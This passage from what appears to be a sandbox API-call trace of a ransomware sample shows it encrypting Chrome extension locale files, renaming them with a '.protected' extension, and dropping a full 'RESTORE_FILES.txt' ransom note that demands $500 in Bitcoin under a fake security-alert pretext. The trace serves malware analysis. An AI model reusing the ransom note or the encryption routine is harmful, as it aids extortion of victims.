lpOverlapped=0x0) returned 1 [0079.751] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.751] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.751] CloseHandle (hObject=0x164) returned 1 [0079.751] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0079.751] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil") returned 144 [0079.751] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0079.751] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0079.751] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*") returned 146 [0079.751] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0x47bc10 [0079.752] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.752] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.752] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.752] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.752] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.752] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\.") returned 146 [0079.752] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.752] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.752] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.752] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.752] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.752] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.752] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.752] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\..") returned 147 [0079.752] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.752] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.752] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.752] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.752] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0079.752] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.752] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.752] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.752] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.753] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0079.753] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.753] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0079.753] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.753] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0079.753] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.753] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.753] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.753] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.754] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.754] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.754] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.754] CloseHandle (hObject=0x168) returned 1 [0079.754] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.protected") returned 168 [0079.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.protected")) returned 1 [0079.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.754] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\RESTORE_FILES.txt") returned 162 [0079.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0079.755] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.755] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.755] lstrlenA (lpString="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") returned 684 [0079.755] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.756] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.756] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.756] CloseHandle (hObject=0x164) returned 1 [0079.756] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0079.756] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr") returned 143 [0079.756] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0079.756] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0079.756] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*") returned 145 [0079.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.757] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.757] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.757] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.757] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.757] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.757] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\.") returned 145 [0079.757] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.757] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.757] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.757] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.757] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.757] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.757] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.757] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\..") returned 146 [0079.757] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.757] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.757] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0079.757] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.757] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.757] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.757] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.758] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0079.758] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.758] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0079.758] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.758] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0079.758] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.758] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.758] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.758] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.759] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.759] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.759] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.759] CloseHandle (hObject=0x168) returned 1 [0079.759] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.protected") returned 167 [0079.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json.protected")) returned 1 [0079.759] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.759] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.759] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\RESTORE_FILES.txt") returned 161 [0079.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.760] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.760] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.761] lstrlenA (lpString="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") returned 684 [0079.761] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.761] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.761] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.761] CloseHandle (hObject=0x164) returned 1 [0079.761] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.761] lstrcmpiW (lpString1="he", lpString2="Windows") returned -1 [0079.761] lstrcmpiW (lpString1="he", lpString2="Program Files") returned -1 [0079.761] lstrcmpiW (lpString1="he", lpString2="Program Files (x86)") returned -1 [0079.761] lstrcmpiW (lpString1="he", lpString2="$Recycle.bin") returned 1 [0079.761] lstrcmpiW (lpString1="he", lpString2="System Volume Information") returned -1 [0079.761] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he") returned 143 [0079.761] lstrcmpW (lpString1="he", lpString2=".") returned 1 [0079.761] lstrcmpW (lpString1="he", lpString2="..") returned 1 [0079.761] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*") returned 145 [0079.761] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
